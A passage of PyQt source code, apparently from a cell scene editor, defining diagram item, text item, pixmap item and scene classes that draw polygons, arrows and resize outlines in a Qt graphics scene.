intersectType = polyLine.intersect(centerLine, intersectPoint)\n if intersectType == QtCore.QLineF.BoundedIntersection:\n break\n p1 = p2\n\n self.setLine(QtCore.QLineF(intersectPoint, myStartItem.pos()))\n line = self.line()\n\n angle = math.acos(line.dx() / line.length())\n if line.dy() >= 0:\n angle = (math.pi * 2.0) - angle\n\n arrowP1 = line.p1() + QtCore.QPointF(math.sin(angle + math.pi / 3.0) * arrowSize,\n math.cos(angle + math.pi / 3) * arrowSize)\n arrowP2 = line.p1() + QtCore.QPointF(math.sin(angle + math.pi - math.pi / 3.0) * arrowSize,\n math.cos(angle + math.pi - math.pi / 3.0) * arrowSize)\n\n self.arrowHead.clear()\n for point in [line.p1(), arrowP1, arrowP2]:\n self.arrowHead.append(point)\n\n painter.drawLine(line)\n painter.drawPolygon(self.arrowHead)\n if self.isSelected():\n painter.setPen(QtGui.QPen(myColor, 1.0, QtCore.Qt.DashLine))\n myLine = QtCore.QLineF(line)\n myLine.translate(0, 4.0)\n painter.drawLine(myLine)\n myLine.translate(0,-8.0)\n painter.drawLine(myLine)\n\n\n# ------------------------------------------------------------\n# ------------------------------------------------------------\nclass DiagramTextItem(QtGui.QGraphicsTextItem):\n signalLostFocus = QtCore.pyqtSignal(QtGui.QGraphicsTextItem)\n signalSelectedChange = QtCore.pyqtSignal(QtGui.QGraphicsItem)\n\n def __init__(self, parent=None, scene=None):\n super(DiagramTextItem, self).__init__(parent, scene)\n\n self.setFlag(QtGui.QGraphicsItem.ItemIsMovable)\n self.setFlag(QtGui.QGraphicsItem.ItemIsSelectable)\n\n def itemChange(self, change, value):\n if change == QtGui.QGraphicsItem.ItemSelectedChange:\n self.signalSelectedChange.emit(self)\n return value\n\n def focusOutEvent(self, event):\n self.setTextInteractionFlags(QtCore.Qt.NoTextInteraction)\n self.signalLostFocus.emit(self)\n super(DiagramTextItem, self).focusOutEvent(event)\n\n def mouseDoubleClickEvent(self, event):\n if self.textInteractionFlags() == QtCore.Qt.NoTextInteraction:\n self.setTextInteractionFlags(QtCore.Qt.TextEditorInteraction)\n super(DiagramTextItem, self).mouseDoubleClickEvent(event)\n\n\n# ------------------------------------------------------------\n# 2010 - Mitja: this is the main item class for the diagram scene:\n# ------------------------------------------------------------\n# (the QGraphicsPolygonItem class is a child of QGraphicsItem)\nclass DiagramItem(QtGui.QGraphicsPolygonItem):\n # 2010 - Mitja: these are possible types for the diagram type:\n # originally 4 types: RectangleConst, TenByTenBoxConst, StartEndConst, TwoByTwoBoxConst = range(4)\n RectangleConst, TenByTenBoxConst, StartEndConst, TwoByTwoBoxConst, PathConst = range(5)\n\n def __init__(self, pDiagramType, contextMenu, parent=None, scene=None):\n super(DiagramItem, self).__init__(parent, scene)\n\n CDConstants.printOut(\"DiagramItem DIAGRAMITEM debugWhoIsTheRunningFunction() is \"+str(debugWhoIsTheRunningFunction())+\" debugWhoIsTheParentFunction() is \"+str(debugWhoIsTheParentFunction()), CDConstants.DebugTODO )\n\n if (CDConstants.globalDebugLevel >= CDConstants.DebugAll):\n import traceback\n traceback.print_stack()\n\n # self.setFillRule(QtCore.Qt.WindingFill) from Qt documentation:\n # Specifies that the region is filled using the non zero winding rule.\n # With this rule, we determine whether a point is inside the shape by\n # using the following method. Draw a horizontal line from the point to a\n # location outside the shape. Determine whether the direction of the line\n # at each intersection point is up or down. The winding number is\n # determined by summing the direction of each intersection. If the number\n # is non zero, the point is inside the shape. This fill mode can also in\n # most cases be considered as the intersection of closed shapes.\n\n self.setFillRule(QtCore.Qt.WindingFill)\n\n self.arrows = []\n # store each item's scaling factors separately for X and Y\n self.myScaleX = 1.0\n self.myScaleY = 1.0\n # 2011 - Mitja: store a backup copy of the item's pen and brush:\n self.bakPen = QtGui.QPen()\n self.bakBrush = QtGui.QBrush()\n # 2011 - Mitja: add a unique counter to identify each DiagramItem in the scene:\n self.regionID = 0\n\n # is this item a region of cells or a single cell?\n self.itsaRegionOrCell = CDConstants.ItsaRegionConst\n self.setRegionOrCell(self.itsaRegionOrCell)\n\n # 2010 - Mitja: add code for handling insertion of Path items:\n # CDConstants.printOut( \" \"+str( \"type(pDiagramType).__name__ = \", type(pDiagramType).__name__ )+\" \", CDConstants.DebugTODO )\n if (type(pDiagramType).__name__ == \"int\") :\n # we are instantiating a normal type of diagram item:\n self.diagramType = pDiagramType\n\n else:\n# else (type(pDiagramType).__name__ is \"QPainterPath\"):\n CDConstants.printOut(\"DEBUG DEBUG ----- DiagramItem(): type(pDiagramType).__name__ = \"+str(type(pDiagramType).__name__), CDConstants.DebugTODO )\n # since we received a QPainterPath parameter \n # we are instantiating a Path type of diagram item:\n self.diagramType = DiagramItem.PathConst\n self.thePathToBuildAPolygon = pDiagramType\n\n self.contextMenu = contextMenu\n\n lThisIsAnUnusedStartEndPath = QtGui.QPainterPath()\n if self.diagramType == self.StartEndConst:\n lThisIsAnUnusedStartEndPath.moveTo(200, 50)\n lThisIsAnUnusedStartEndPath.arcTo(150, 0, 50, 50, 0, 90)\n lThisIsAnUnusedStartEndPath.arcTo(50, 0, 50, 50, 90, 90)\n lThisIsAnUnusedStartEndPath.arcTo(50, 50, 50, 50, 180, 90)\n lThisIsAnUnusedStartEndPath.arcTo(150, 50, 50, 50, 270, 90)\n lThisIsAnUnusedStartEndPath.lineTo(200, 25)\n self.myPolygon = lThisIsAnUnusedStartEndPath.toFillPolygon()\n elif self.diagramType == self.TenByTenBoxConst:\n self.myPolygon = QtGui.QPolygonF([\n QtCore.QPointF(-5, -5), QtCore.QPointF(-5, 5),\n QtCore.QPointF(5, 5), QtCore.QPointF(5, -5),\n QtCore.QPointF(-5, -5)])\n# QtCore.QPointF(-100, 0), QtCore.QPointF(0, 100),\n# QtCore.QPointF(100, 0), QtCore.QPointF(0, -100),\n# QtCore.QPointF(-100, 0)])\n elif self.diagramType == self.RectangleConst:\n self.myPolygon = QtGui.QPolygonF([\n QtCore.QPointF(-50, -50), QtCore.QPointF(50, -50),\n QtCore.QPointF(50, 50), QtCore.QPointF(-50, 50),\n QtCore.QPointF(-50, -50)])\n# QtCore.QPointF(-100, -100), QtCore.QPointF(100, -100),\n# QtCore.QPointF(100, 100), QtCore.QPointF(-100, 100),\n# QtCore.QPointF(-100, -100)])\n elif self.diagramType == self.TwoByTwoBoxConst:\n self.myPolygon = QtGui.QPolygonF([\n QtCore.QPointF(-1, -1), QtCore.QPointF(-1, 1),\n QtCore.QPointF(1, 1), QtCore.QPointF(1, -1),\n QtCore.QPointF(-1, -1)])\n# self.myPolygon = QtGui.QPolygonF([\n# QtCore.QPointF(-120, -80), QtCore.QPointF(-70, 80),\n# QtCore.QPointF(120, 80), QtCore.QPointF(70, -80),\n# QtCore.QPointF(-120, -80)])\n elif self.diagramType == self.PathConst:\n # CDConstants.printOut( \" \"+str( \"self.thePathToBuildAPolygon =\", self.thePathToBuildAPolygon )+\" \", CDConstants.DebugTODO )\n # convert from painter path to polygon:\n self.thePathToBuildAPolygon = self.thePathToBuildAPolygon.simplified()\n\n self.myPolygon = self.thePathToBuildAPolygon.toFillPolygon()\n\n # 2010 - Mitja: create a Path item here:\n # self.setPath(self.thePathToBuildAPolygon)\n\n # build a temporary QGraphicsPolygonItem and assign the constructed polygon to it:\n# lTempGraphicsItem = QtGui.QGraphicsPolygonItem()\n# lTempGraphicsItem.setPolygon(self.myPolygon)\n # self.setPolygon(self.myPolygon)\n\n# CDConstants.printOut( \" \"+str( \"tmp polyg (diagramType=\", self.diagramType,\").boundingRect =\",lTempGraphicsItem.polygon().boundingRect() )+\" \", CDConstants.DebugTODO )\n# CDConstants.printOut( \" \"+str( \" hello, I'm %s, parent is %s\" % (debugWhoIsTheRunningFunction(), debugWhoIsTheParentFunction()) )+\" \", CDConstants.DebugTODO )\n# CDConstants.printOut( \" \"+str( \" boundingRegionGranularity =\", lTempGraphicsItem.boundingRegionGranularity() )+\" \", CDConstants.DebugTODO )\n# lTempGraphicsItem.setBoundingRegionGranularity(1.0)\n# CDConstants.printOut( \" \"+str( \" boundingRegionGranularity =\", lTempGraphicsItem.boundingRegionGranularity() )+\" \", CDConstants.DebugTODO )\n# \n# # obtain the QGraphicsPolygonItem's bounding QRegion in local coordinates, passing an identity QTransform:\n# lBoundingRegion = lTempGraphicsItem.boundingRegion(QtGui.QTransform())\n# CDConstants.printOut( \" \"+str( \" boundingRegion =\", lBoundingRegion )+\" \", CDConstants.DebugTODO )\n# CDConstants.printOut( \" \"+str( \" boundingRegion.boundingRect() =\", lBoundingRegion.boundingRect() )+\" \", CDConstants.DebugTODO )\n# CDConstants.printOut( \" \"+str( \" boundingRegion.rectCount() =\", lBoundingRegion.rectCount() )+\" \", CDConstants.DebugTODO )\n\n # create a QPainterPath from the bounding QRegion:\n# lNewPainterPath = QtGui.QPainterPath()\n# lNewPainterPath.addRegion(lBoundingRegion)\n# \n# lNewPainterPath = lNewPainterPath.simplified()\n# \n# CDConstants.printOut( \" \"+str( \" lNewPainterPath =\", lNewPainterPath )+\" \", CDConstants.DebugTODO )\n# CDConstants.printOut( \" \"+str( \" lNewPainterPath.boundingRect() =\", lNewPainterPath.boundingRect() )+\" \", CDConstants.DebugTODO )\n\n # re-define the QGraphicsPolygonItem's QPolygonF from the newly built QPainterPath:\n # self.setPolygon = QtGui.QPolygonF(QtCore.QRectF(10, 10, 100, 200))\n # tmpPolygon = lNewPainterPath.toFillPolygon()\n# self.setPolygon(tmpPolygon)\n\n\n # 2011 - Mitja: re-center the incoming path so that its bounding rectangle\n # is 0-centered, and instead add a displacement to the item if necessary.\n\n # extract the boundingRect() to center the polygon's individual points()\n lBoundingRect = self.myPolygon.boundingRect()\n lCenterOfItemX = (lBoundingRect.width() * 0.5) + lBoundingRect.topLeft().x()\n lCenterOfItemY = (lBoundingRect.height() * 0.5) + lBoundingRect.topLeft().y()\n\n CDConstants.printOut(\"in DiagramItem._init_(): the bounding rect is = \"+str(lBoundingRect) , CDConstants.DebugVerbose )\n CDConstants.printOut(\"in DiagramItem._init_(): the rect's center is = \"+str(lCenterOfItemX)+\" \"+str(lCenterOfItemY) , CDConstants.DebugVerbose )\n\n lZeroCenteredPolygon = QtGui.QPolygonF()\n for lPointF in self.myPolygon:\n lZeroCenteredPointF = QtCore.QPointF( ( lPointF.x() - lCenterOfItemX ),\n ( lPointF.y() - lCenterOfItemY ) )\n # CDConstants.printOut( \" \"+str( \"DiagramItem_init_(): lPointF, lZeroCenteredPointF =\", lPointF, lZeroCenteredPointF )+\" \", CDConstants.DebugVerbose )\n lZeroCenteredPolygon.append(lZeroCenteredPointF)\n\n\n # finally assign the fixed QPolygonF to the QGraphicsPolygonItem:\n self.setPolygon(lZeroCenteredPolygon)\n self.setPos( QtCore.QPointF( lCenterOfItemX, lCenterOfItemY ) )\n\n self.setFlag(QtGui.QGraphicsItem.ItemIsMovable, True)\n self.setFlag(QtGui.QGraphicsItem.ItemIsSelectable, True)\n\n CDConstants.printOut(\" polygon (diagramType=\"+str(self.diagramType)+\").boundingRect =\"+str(self.polygon().boundingRect()) , CDConstants.DebugVerbose )\n CDConstants.printOut(\" item (diagramType=\"+str(self.diagramType)+\").boundingRect =\"+str(self.boundingRect()) , CDConstants.DebugVerbose )\n CDConstants.printOut(\" item (diagramType=\"+str(self.diagramType)+\").pen =\"+str(self.pen()) , CDConstants.DebugVerbose )\n CDConstants.printOut(\" item (diagramType=\"+str(self.diagramType)+\").brush =\"+str(self.brush()) , CDConstants.DebugVerbose )\n\n # 2010 - Mitja: we could override paint:\n# def paint(self, pPainter, pStyleOptionGraphicsItem, pWidget=None):\n# super(DiagramItem, self).paint(pPainter, pStyleOptionGraphicsItem, pWidget)\n# lBoundingRect = self.boundingRect()\n# CDConstants.printOut( \" \"+str( \"self.scene().myOutlineResizingItem =\", self.scene().myOutlineResizingItem )+\" \", CDConstants.DebugTODO )\n# self.scene().myOutlineResizingItem = self\n# CDConstants.printOut( \" \"+str( \"self.scene().myOutlineResizingItem =\", self.scene().myOutlineResizingItem )+\" \", CDConstants.DebugTODO )\n# # painter->drawRoundedRect(-10, -10, 20, 20, 5, 5);\n CDConstants.printOut(\"--------------------------------------------- DiagramItem.__init__() end\", CDConstants.DebugExcessive )\n # end of def __init__(self, pDiagramType, contextMenu, parent=None, scene=None)\n # ------------------------------------------------------------------\n\n\n\n\n # ------------------------------------------------------------------\n # 2011 - Mitja: for each scene item, is this item a region of cells or a single cell?\n # ------------------------------------------------------------------\n def setRegionOrCell(self, pRegionOrCell):\n\n self.itsaRegionOrCell = pRegionOrCell\n \n # is this item a region of cells or a single cell?\n if (self.itsaRegionOrCell == CDConstants.ItsaRegionConst):\n # for region items, use darkMagenta pen:\n CDConstants.printOut(\"setRegionOrCell does CDConstants.ItsaRegionConst\", CDConstants.DebugTODO )\n lMyPen = QtGui.QPen(QtCore.Qt.darkMagenta, 0.0, QtCore.Qt.SolidLine, QtCore.Qt.RoundCap, QtCore.Qt.RoundJoin)\n elif (self.itsaRegionOrCell == CDConstants.ItsaCellConst):\n # for cell items, use an orange \"#FF9900\" or (255, 153, 0) pen:\n CDConstants.printOut(\"setRegionOrCell does CDConstants.ItsaCellConst\", CDConstants.DebugTODO )\n lMyCellOutlineColor = QtGui.QColor(255, 153, 0)\n lMyPen = QtGui.QPen(lMyCellOutlineColor, 0.0, QtCore.Qt.SolidLine, QtCore.Qt.RoundCap, QtCore.Qt.RoundJoin)\n else:\n # for unknown items, use darkRed pen:\n CDConstants.printOut(\"setRegionOrCell does darkRed for UNKNOWN items\", CDConstants.DebugTODO )\n lMyPen = QtGui.QPen(QtCore.Qt.darkRed, 0.0, QtCore.Qt.SolidLine, QtCore.Qt.RoundCap, QtCore.Qt.RoundJoin)\n \n # 2011 - Mitja: according to Qt's documentation: \"QGraphicsItem\n # does not support use of cosmetic pens with a non-zero width\" :\n lMyPen.setCosmetic(True)\n\n CDConstants.printOut(\"setRegionOrCell does item.pen().color().rgba() = \"+str(self.pen().color().rgba()), CDConstants.DebugTODO )\n self.setPen(lMyPen)\n CDConstants.printOut(\"setRegionOrCell does item.pen().color().rgba() = \"+str(self.pen().color().rgba()), CDConstants.DebugTODO )\n\n # ------------------------------------------------------------------\n def setRegionID(self, pID):\n self.regionID = pID\n CDConstants.printOut(\"DiagramItem.setRegionID(\"+str(self.regionID)+\")\", CDConstants.DebugTODO )\n\n # ------------------------------------------------------------------\n def getRegionID(self):\n # CDConstants.printOut( \" \"+str( \"DiagramItem.getRegionID() =\",self.regionID )+\" \", CDConstants.DebugTODO )\n return (self.regionID)\n\n # ------------------------------------------------------------------\n def saveAndClearPen(self):\n # 2011 - Mitja: store a backup copy of the item's pen:\n self.bakPen = QtGui.QPen(self.pen())\n # 2011 - Mitja: create and assign an invisible pen:\n lMyPen = QtGui.QPen(QtCore.Qt.transparent, 0.0)\n lMyPen.setCosmetic(True)\n self.setPen(lMyPen)\n\n # ------------------------------------------------------------------\n def restorePen(self):\n # 2011 - Mitja: restore the backup copy to the item's active pen:\n self.setPen(self.bakPen)\n\n # ------------------------------------------------------------------\n def saveAndClearBrush(self):\n # 2011 - Mitja: store a backup copy of the item's Brush:\n self.bakBrush = QtGui.QBrush(self.brush())\n # 2011 - Mitja: create and assign a plain black Brush:\n lMyBrush = QtGui.QBrush(QtGui.QColor(QtCore.Qt.black))\n self.setBrush(lMyBrush)\n\n # ------------------------------------------------------------------\n def restoreBrush(self):\n # 2011 - Mitja: restore the backup copy to the item's active Brush:\n self.setBrush(self.bakBrush)\n\n # ------------------------------------------------------------------\n def removeArrow(self, arrow):\n try:\n self.arrows.remove(arrow)\n except ValueError:\n pass\n\n # ------------------------------------------------------------------\n def removeArrows(self):\n for arrow in self.arrows[:]:\n arrow.startItem().removeArrow(arrow)\n arrow.endItem().removeArrow(arrow)\n self.scene().removeItem(arrow)\n\n # ------------------------------------------------------------------\n def addArrow(self, arrow):\n self.arrows.append(arrow)\n\n\n # ------------------------------------------------------------------\n # 2010 - Mitja: renamed this method from \"image\" to \"pixmapForIconFromPolygon\"\n # since it returns a pixmap, NOT an image!!!\n # ------------------------------------------------------------------\n def pixmapForIconFromPolygon(self, pText=None):\n pixmap = QtGui.QPixmap(210, 210)\n pixmap.fill(QtCore.Qt.transparent)\n painter = QtGui.QPainter(pixmap)\n painter.setPen(QtGui.QPen(QtCore.Qt.black, 8.0))\n painter.translate(105, 105)\n\n # self.setFillRule(QtCore.Qt.WindingFill) from Qt documentation:\n # Specifies that the region is filled using the non zero winding rule.\n # With this rule, we determine whether a point is inside the shape by\n # using the following method. Draw a horizontal line from the point to a\n # location outside the shape. Determine whether the direction of the line\n # at each intersection point is up or down. The winding number is\n # determined by summing the direction of each intersection. If the number\n # is non zero, the point is inside the shape. This fill mode can also in\n # most cases be considered as the intersection of closed shapes.\n\n painter.drawPolygon(self.polygon(), QtCore.Qt.WindingFill)\n \n if (pText != None):\n# painter.translate(-110, 100)\n painter.setFont(QtGui.QFont(\"Helvetica\", 72))\n painter.drawText(QtCore.QRectF(-105,30,210,100), QtCore.Qt.AlignCenter, pText)\n \n painter.end()\n\n return pixmap\n\n\n # ------------------------------------------------------------------\n def contextMenuEvent(self, event):\n # 2010 - Mitja: nothing to be done as \"context menu event\" here at the moment:\n # self.scene().clearSelection()\n # self.setSelected(True)\n # self.myContextMenu.exec_(event.screenPos())\n pass\n\n # ------------------------------------------------------------------\n def itemChange(self, change, value):\n # CDConstants.printOut( \" \"+str( \"itemChange() itemChange() itemChange() itemChange() itemChange() itemChange() change, value =\", change, value )+\" \", CDConstants.DebugTODO )\n if change == QtGui.QGraphicsItem.ItemPositionChange:\n for arrow in self.arrows:\n arrow.updatePosition()\n\n return value\n\n # ---------------------------------------------------------\n # end of class DiagramItem(QtGui.QGraphicsPolygonItem)\n # ---------------------------------------------------------\n\n# ------------------------------------------------------------\n# 2010 - Mitja: add code for handling insertion of pixmap items:\n# this class is UNUSED and can be safely removed in production code.\n# ------------------------------------------------------------\nclass DiagramPixmapItem(QtGui.QGraphicsPixmapItem):\n\n # ---------------------------------------------------------\n def __init__(self, pPixmap, pContextMenu, pParent=None, pScene=None):\n super(DiagramPixmapItem, self).__init__(pParent, pScene)\n\n self.arrows = []\n\n self.itemPixmap = pPixmap\n self.contextMenu = pContextMenu\n\n# path = QtGui.QPainterPath()\n# self.myPolygon = QtGui.QPolygonF([\n# QtCore.QPointF(-120, -80), QtCore.QPointF(-70, 80),\n# QtCore.QPointF(120, 80), QtCore.QPointF(70, -80),\n# QtCore.QPointF(-120, -80)])\n\n # 2010 - Mitja: create a pixmap item here:\n self.setPixmap(self.itemPixmap)\n\n self.setFlag(QtGui.QGraphicsItem.ItemIsMovable, True)\n self.setFlag(QtGui.QGraphicsItem.ItemIsSelectable, True)\n\n # ---------------------------------------------------------\n def removeArrow(self, arrow):\n try:\n self.arrows.remove(arrow)\n except ValueError:\n pass\n\n # ---------------------------------------------------------\n def removeArrows(self):\n for arrow in self.arrows[:]:\n arrow.startItem().removeArrow(arrow)\n arrow.endItem().removeArrow(arrow)\n self.scene().removeItem(arrow)\n\n # ---------------------------------------------------------\n def addArrow(self, arrow):\n self.arrows.append(arrow)\n\n # ---------------------------------------------------------\n def pixmapForIconFromPolygon(self):\n\n # 1. get a copy of the QGraphicsPixmapItem's pixmap:\n lOriginalPixmap = QtGui.QPixmap.fromImage(self.pixmap().toImage())\n\n # 3. create an empty pixmap where to store the composed image:\n lResultPixmap = QtGui.QPixmap(250, 250)\n # 4. create a QPainter to perform the overlay operation:\n lPainter = QtGui.QPainter(lResultPixmap)\n # 5. do the overlay:\n lPainter.setCompositionMode(lPainter.CompositionMode_Source)\n lPainter.fillRect(lResultPixmap.rect(), QtCore.Qt.transparent)\n lPainter.setCompositionMode(lPainter.CompositionMode_SourceOver)\n lPainter.drawPixmap(QtCore.QPoint(0,0), lOriginalPixmap)\n lPainter.end() \n \n return lResultPixmap\n\n\n # ---------------------------------------------------------\n def contextMenuEvent(self, event):\n self.scene().clearSelection()\n self.setSelected(True)\n self.myContextMenu.exec_(event.screenPos())\n\n # ---------------------------------------------------------\n def itemChange(self, change, value):\n if change == QtGui.QGraphicsItem.ItemPositionChange:\n for arrow in self.arrows:\n arrow.updatePosition()\n\n return value\n # ---------------------------------------------------------\n\n # ---------------------------------------------------------\n # end of class DiagramPixmapItem(QtGui.QGraphicsPixmapItem)\n # ---------------------------------------------------------\n\n\n# ------------------------------------------------------------\n# ------------------------------------------------------------\nclass DiagramScene(QtGui.QGraphicsScene):\n\n signalThatItemInserted = QtCore.pyqtSignal(DiagramItem)\n\n signalThatTextInserted = QtCore.pyqtSignal(QtGui.QGraphicsTextItem)\n\n signalThatItemSelected = QtCore.pyqtSignal(QtGui.QGraphicsItem)\n\n # 2011 - Mitja:\n signalThatItemResized = QtCore.pyqtSignal(QtCore.QRectF)\n\n # 2011 - Mitja: add a signal for scene resizing. Has to be handled well!\n signalThatSceneResized = QtCore.pyqtSignal(dict)\n\n\n def __init__(self, pEditMenu, pParent=None):\n super(DiagramScene, self).__init__(pParent)\n\n self.parentWidget = pParent\n self.myItemMenu = pEditMenu\n self.mySceneMode = CDConstants.SceneModeMoveItem\n if self.parentWidget.parentWindow != None:\n self.parentWidget.parentWindow.setWindowTitle(\"Cell Scene Editor\")\n\n # 2010 - Mitja: to resize an item by using the right-click,\n # add a global variable flag, i.e. direct pointer to the item being resized:\n self.myRightButtonResizingItem = None\n self.myRightButtonResizingClickX = -1.0\n self.myRightButtonResizingClickY = -1.0\n\n # 2010 - Mitja: to resize an item by using an outline of the item's bounding rectangle,\n # add a global variable flag, i.e. direct pointer to the item being resized:\n self.myOutlineResizingItem = None\n # myOutlineResizingVertex can be: \"None\", \"bottomLeft\", \"bottomRight\", \"topRight\", \"topLeft\":\n self.myOutlineResizingVertex = \"None\"\n self.myOutlineResizingCurrentX = -1.0\n self.myOutlineResizingCurrentY = -1.0\n\n # 2010 - Mitja: add scene units:\n self.mySceneUnits = \"Pixel\"\n\n # 2011 - Mitja: add scene depth:\n self.mySceneDepth = 1.0\n\n\n # 2011 - Mitja: a reference to a sequence of images:\n self.theImageSequence = None\n\n\n # 2011 - Mitja: a reference to an external QPaint-drawing class,\n # to draw an overlay in drawForeground() :\n self.theImageLayer = None\n # 2011 - Mitja: flag to temporarily completely disable drawing the overlay:\n self.isDrawForegroundEnabled = True\n # 2011 - Mitja: flag to prevent recursive repaints (shouldn't this be handled automatically by Qt?!?):\n self.isDrawForegroundInProgress = False\n\n # 2011 -\n # regionUseDict = a dict of all region names and their current use,\n # one for each RGBA color: [name,#regions](color)\n self.regionUseDict = {}\n\n\n # 2011 - Mitja: set defaults for each new Item in the Scene:\n self.myItemRegionOrCell = CDConstants.ItsaRegionConst\n\n self.myItemType = DiagramItem.RectangleConst\n self.line = None\n self.textItem = None\n self.myItemColor = QtCore.Qt.green\n self.myTextColor = QtCore.Qt.red\n self.myLineColor = QtCore.Qt.black\n self.myFont = QtGui.QFont()\n \n # 2011 - Mitja: an ever-incrementing totalItemsCounter, to keep a unique\n # string as toolTip for each item in the scene.\n self.totalItemsCounter = int(0)\n \n # 2011 Mitja - add scale/zoom parameters stored into our DiagramScene object:\n # This is just so that we can scale the outline's circles/ellipses\n # when interactively/manually scaling a scene item.\n # The scale factor takes care of the RHS <-> LHS mismatch at its visible end,\n # by flipping the y coordinate in the QGraphicsView's affine transformations:\n self.myViewScaleZoomX = 1.0\n self.myViewScaleZoomY = -1.0\n\n\n\n # ------------------------------------------------------------\n # 2011 - Mitja: set the depth value for scene, to keep for completeness:\n # ------------------------------------------------------------\n def setDepth(self, pValue = 1.0):\n # 2011 - Mitja - add scene depth:\n self.mySceneDepth = pValue\n\n # ------------------------------------------------------------\n # 2011 - Mitja: set the depth value for scene, to keep for completeness:\n # ------------------------------------------------------------\n def depth(self):\n # 2011 - Mitja - add scene depth:\n return self.mySceneDepth\n\n\n # ------------------------------------------------------------\n # 2011 - Mitja: set the reference for overlay drawing in drawForeground() :\n # ------------------------------------------------------------\n def setImageLayer(self, pImageLayer = None):\n if isinstance( pImageLayer, CDImageLayer ) == True:\n self.theImageLayer = pImageLayer\n\n\n\n # ------------------------------------------------------------\n # 2011 - Mitja: set the reference for a sequence of images:\n # ------------------------------------------------------------\n def setImageSequence(self, pImageSequence = None):\n if isinstance( pImageSequence, CDImageSequence ) == True:\n self.theImageSequence = pImageSequence\n\n\n\n # ------------------------------------------------------------\n # 2011 - Mitja: set flag to temporarily completely disable drawing the overlay:\n # ------------------------------------------------------------\n def setDrawForegroundEnabled(self, pYesOrNo = True):\n self.isDrawForegroundEnabled = pYesOrNo\n CDConstants.printOut(\"DiagramScene.setDrawForegroundEnabled( pYesOrNo==\"+str(pYesOrNo)+\" )\", CDConstants.DebugTODO )\n\n\n\n # ------------------------------------------------------------\n # 2012 - Mitja: retrieve the flag to temporarily completely disable drawing the overlay:\n # ------------------------------------------------------------\n def getDrawForegroundEnabled(self):\n CDConstants.printOut(\"DiagramScene.getDrawForegroundEnabled() returning \" +str(self.isDrawForegroundEnabled), CDConstants.DebugTODO )\n return self.isDrawForegroundEnabled\n\n\n\n # ------------------------------------------------------------\n # 2010 - Mitja - we reimplement drawForeground() because\n # we need to draw an outline of the selected item on the top (foreground) of the scene\n # ------------------------------------------------------------\n def drawForeground(self, pPainter, pRect):\n super(DiagramScene, self).drawForeground(pPainter, pRect)\n\n # check the flag that temporarily completely disables drawing the overlay:\n if (self.isDrawForegroundEnabled == False):\n return\n\n # check the flag that signals drawForeground() in progress...\n # ....to prevent recursive repaints (shouldn't this be handled automatically by Qt?!?) :\n if (self.isDrawForegroundInProgress == True):\n return\n else:\n # set the flag that signals drawForeground() in progress:\n self.isDrawForegroundInProgress = True\n\n\n # 2011 - Mitja - use this overlay routine to draw a single instance of one cluster\n # as foreground to the graphics scene, in \"SceneModeEditCluster\"\n if (self.mySceneMode == CDConstants.SceneModeEditCluster):\n\n # store the current pen & brush & background & bg mode to restore them later:\n lTmpPen = pPainter.pen()\n lTmpBrush = pPainter.brush()\n lTmpBackground = pPainter.background()\n lTmpBackgroundMode = pPainter.backgroundMode()\n\n # TODO: replace with a new paint call for scene edit clusters!\n\n # this used to call the theImageSequence's paintEvent handler directly: self.theImageSequence.paintEvent(pPainter)\n # but direct paintEvent calls are BAD! instead we now call our separate paint routine:\n # self.theImageSequence.paintTheImageSequence(pPainter)\n\n # restore the painter's pen & background to what they were before this function:\n pPainter.setPen(lTmpPen)\n pPainter.setBrush(lTmpBrush)\n pPainter.setBackground(lTmpBackground)\n pPainter.setBackgroundMode(lTmpBackgroundMode)\n\n\n # 2011 - Mitja - use this overlay routine to draw selected content from an image sequence\n # as foreground to the graphics scene, in \"SceneModeImageSequence\"\n if (self.mySceneMode == CDConstants.SceneModeImageSequence) and \\\n (self.theImageSequence != None):\n\n # store the current pen & brush & background & bg mode to restore them later:\n lTmpPen = pPainter.pen()\n lTmpBrush = pPainter.brush()\n lTmpBackground = pPainter.background()\n lTmpBackgroundMode = pPainter.backgroundMode()\n \n # this used to call the theImageSequence's paintEvent handler directly: self.theImageSequence.paintEvent(pPainter)\n # but direct paintEvent calls are BAD! instead we now call our separate paint routine:\n self.theImageSequence.paintTheImageSequence(pPainter)\n \n # restore the painter's pen & background to what they were before this function:\n pPainter.setPen(lTmpPen)\n pPainter.setBrush(lTmpBrush)\n pPainter.setBackground(lTmpBackground)\n pPainter.setBackgroundMode(lTmpBackgroundMode)\n\n\n\n # 2011 - Mitja - use this overlay routine to draw an image label\n # as foreground to the graphics scene, in \"image layer mode\"\n elif (self.mySceneMode == CDConstants.SceneModeImageLayer) and \\\n (self.theImageLayer != None):\n\n # store the current pen & brush & background & bg mode to restore them later:\n lTmpPen = pPainter.pen()\n lTmpBrush = pPainter.brush()\n lTmpBackground = pPainter.background()\n lTmpBackgroundMode = pPainter.backgroundMode()\n \n # this used to call the theImageLayer's paintEvent handler directly: self.theImageLayer.paintEvent(pPainter)\n # but direct paintEvent calls are BAD! instead we now call our separate paint routine:\n self.theImageLayer.paintTheImageLayer(pPainter)\n \n # restore the painter's pen & background to what they were before this function:\n pPainter.setPen(lTmpPen)\n pPainter.setBrush(lTmpBrush)\n pPainter.setBackground(lTmpBackground)\n pPainter.setBackgroundMode(lTmpBackgroundMode)\n\n\n # 2010 - Mitja - draw an overlay outline of the item being resized\n # by dragging one of the outline corner vertices:\n elif self.myOutlineResizingItem != None:\n# TODO: find the true bounding rect for the item's polygon WITHOUT its border: lBoundingRect = self.myOutlineResizingItem.polygon().sceneBoundingRect()\n lBoundingRect = self.myOutlineResizingItem.sceneBoundingRect()\n # store the current pen & brush & background & bg mode to restore them later:\n lTmpPen = pPainter.pen()\n lTmpBrush = pPainter.brush()\n lTmpBackground = pPainter.background()\n lTmpBackgroundMode = pPainter.backgroundMode()\n\n# lOutlinePen = QtGui.QPen( QtGui.QColor(255, 128, 0) )\n# lOutlinePen.setWidth(4)\n\n # draw the rectangular outline of the QGraphicsItem which is being resized:\n # draw in two colors, solid and dotted:\n lOutlineColor = QtGui.QColor(35, 166, 94)\n # we set al QtGui.QPen sizes to 0.0 for cosmetic lines that have to remain of minimal line-width when zooming:\n lOutlinePen = QtGui.QPen(lOutlineColor, 0.0, QtCore.Qt.SolidLine, QtCore.Qt.RoundCap, QtCore.Qt.RoundJoin)\n # lOutlinePen = QtGui.QPen(lOutlineColor, 2, QtCore.Qt.SolidLine, QtCore.Qt.RoundCap, QtCore.Qt.RoundJoin)\n lOutlinePen.setCosmetic(True)\n pPainter.setPen(lOutlinePen)\n pPainter.drawRect(lBoundingRect)\n\n lOutlineColor = QtGui.QColor(219, 230, 249)\n lOutlinePen = QtGui.QPen(lOutlineColor, 0.0, 